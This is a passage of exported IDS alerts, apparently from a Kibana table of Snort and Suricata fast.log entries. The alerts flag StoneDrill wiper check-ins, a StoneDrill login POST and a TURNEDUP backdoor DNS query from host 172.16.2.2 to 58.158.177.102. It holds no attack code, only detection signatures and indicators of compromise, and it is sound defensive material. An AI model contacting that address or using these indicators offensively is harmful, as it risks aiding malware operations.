58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:29.920","05/28-13:22:28.030603 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49713 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:16.748","05/28/2020-13:22:14.146299 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49709 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:14.916","05/28-13:22:13.543414 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49709 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:11.895","05/28-13:22:07.977105 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49705 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:09.743","05/28/2020-13:22:08.271426 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49705 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:22:04.892","05/28-13:22:02.238412 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49704 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:22:02.740","05/28/2020-13:22:02.533789 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49704 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:59.730","05/28/2020-13:21:56.942324 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper 
Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49703 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:57.800","05/28-13:21:56.682811 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49703 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:54.797","05/28-13:21:50.692100 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49701 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:52.728","05/28/2020-13:21:45.391479 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49700 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:52.728","05/28/2020-13:21:51.385442 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49701 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:47.792","05/28-13:21:45.117690 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49700 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:40.789","05/28-13:21:36.525164 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49699 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:37.725","05/28/2020-13:21:36.804878 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49699 -> 
58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:33.769","05/28-13:21:29.902815 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49698 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:30.723","05/28/2020-13:21:30.195771 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49698 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:27.721","05/28/2020-13:21:24.247646 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49697 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:26.767","05/28-13:21:23.970189 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49697 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:20.719","05/28/2020-13:21:18.680552 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49695 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:19.764","05/28-13:21:18.410947 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49695 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:13.712","05/28/2020-13:21:12.129552 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49693 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:12.761","05/28-13:21:11.807254 [**] [1:2808510:3] ETPRO TROJAN 
StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49693 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:11.760","05/28-13:21:09.190302 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49692 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:10.711","05/28/2020-13:21:06.865775 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49691 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:10.711","05/28/2020-13:21:09.470738 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49692 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:08.757","05/28-13:21:06.590259 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49691 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:05.756","05/28-13:21:02.806693 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49690 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:03.709","05/28/2020-13:21:03.260718 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49690 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:02.753","05/28-13:21:00.189766 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49689 -> 
58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:00.707","05/28/2020-13:21:00.490952 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49689 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:59.751","05/28-13:20:57.519712 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49688 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:59.706","05/28/2020-13:20:57.797044 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49688 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:56.749","05/28-13:20:54.930480 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49687 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:56.705","05/28/2020-13:20:55.216110 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49687 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:53.748","05/28-13:20:52.066863 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49686 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:53.703","05/28/2020-13:20:52.641108 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49686 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:50.737","05/28-13:20:49.374459 [**] [1:2808510:3] ETPRO TROJAN 
StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49685 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:50.702","05/28/2020-13:20:49.768176 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49685 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:49.736","05/28-13:20:43.226172 [**] [1:2825294:1] ETPRO TROJAN StoneDrill POST Login Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49682 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:49.736","05/28-13:20:44.050150 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49683 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:49.736","05/28-13:20:46.744672 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49684 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:49.701","05/28/2020-13:20:42.904575 [**] [1:2024732:5] ET MALWARE DNS Query For TURNEDUP.Backdoor CnC (googlmail) [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {UDP} 172.16.2.2:57732 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:49.701","05/28/2020-13:20:43.498632 [**] [1:2825294:2] ETPRO MALWARE StoneDrill POST Login Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49682 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:49.701","05/28/2020-13:20:44.456351 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49683 -> 
58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:49.701","05/28/2020-13:20:47.044963 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49684 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:19:34.687","05/28/2020-13:19:28.013959 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:19:34.686","05/28-13:19:27.092278 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:19:19.684","05/28/2020-13:19:16.804378 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50178 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:19:19.683","05/28-13:19:16.519120 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50178 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:19:12.682","05/28/2020-13:19:06.252924 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50177 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:19:12.680","05/28-13:19:05.956598 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50177 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:57.676","05/28/2020-13:18:55.664095 [**] [1:2808510:5] ETPRO 
MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50170 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:57.676","05/28-13:18:55.352285 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50170 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:50.674","05/28-13:18:44.740331 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50150 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:50.674","05/28/2020-13:18:45.040291 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50150 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:35.672","05/28-13:18:33.948585 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50118 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:35.671","05/28/2020-13:18:34.473889 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50118 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:28.657","05/28/2020-13:18:23.643183 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:28.657","05/28-13:18:23.256740 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 
58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:13.610","05/28/2020-13:18:11.915692 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50111 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:13.610","05/28-13:18:11.618625 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50111 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:06.608","05/28/2020-13:18:01.273359 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50110 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:06.608","05/28-13:18:01.015501 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50110 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:51.605","05/28-13:17:50.414091 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50106 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:51.605","05/28/2020-13:17:50.731881 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50106 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:48.603","05/28/2020-13:17:45.042884 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50102 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:48.603","05/28-13:17:44.757604 [**] [1:2808510:3] ETPRO TROJAN 
StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50102 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:41.598","05/28-13:17:39.181592 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50101 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:41.598","05/28/2020-13:17:39.457905 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50101 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:34.567","05/28/2020-13:17:33.898339 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50100 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:34.554","05/28-13:17:33.568527 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50100 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:31.564","05/28/2020-13:17:28.284330 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50097 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:31.553","05/28-13:17:27.991017 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50097 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:24.561","05/28/2020-13:17:22.639659 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50096 -> 
58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:24.547","05/28-13:17:22.352269 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50096 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:17.556","05/28/2020-13:17:17.021695 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50095 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:17.533","05/28-13:17:16.398731 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50095 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:16.533","05/28-13:17:10.843225 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50092 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:14.555","05/28/2020-13:17:11.113841 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50092 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:01.530","05/28-13:16:57.726240 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50089 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:59.552","05/28/2020-13:16:58.018693 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50089 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:54.523","05/28-13:16:52.152664 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 
2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50087 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:52.550","05/28/2020-13:16:52.429203 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50087 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:49.549","05/28/2020-13:16:46.833669 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50085 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:47.521","05/28-13:16:46.396940 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50085 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:44.518","05/28-13:16:40.744091 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50083 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:42.545","05/28/2020-13:16:41.054784 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50083 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:37.515","05/28-13:16:28.545429 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50075 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:37.515","05/28-13:16:34.199205 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50082 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 
13:16:35.543","05/28/2020-13:16:35.391599 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50082 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:32.541","05/28/2020-13:16:28.846647 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50075 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:25.537","05/28/2020-13:16:22.236061 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50058 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:22.512","05/28-13:16:21.238591 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50058 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:19.502","05/28-13:16:15.645649 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50051 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:18.534","05/28/2020-13:16:15.973775 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50051 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:12.501","05/28-13:16:10.034263 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50047 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:11.524","05/28/2020-13:16:10.330823 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware 
Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50047 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:05.498","05/28-13:16:00.248673 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50040 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:04.521","05/28/2020-13:16:01.136995 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50040 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:58.495","05/28-13:15:54.577408 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50034 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:57.499","05/28/2020-13:15:54.866558 [**] [1:2808510:5] ETPRO MALWARE StoneDrill 